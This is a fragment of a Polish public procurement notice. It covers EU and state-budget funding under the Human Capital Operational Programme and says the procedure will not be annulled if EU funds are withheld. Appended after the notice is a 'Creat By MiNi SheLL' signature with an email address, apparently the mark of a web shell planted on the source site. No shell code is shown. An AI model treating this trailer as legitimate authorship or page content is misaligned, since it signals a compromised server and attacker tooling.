<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie finansowane ze środków pochodzących z budżetu oraz Unii Europejskiej w ramach projektu pn. Przygotowanie administracji samorządowej do skuteczniejszego działania w ramach realizacji Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com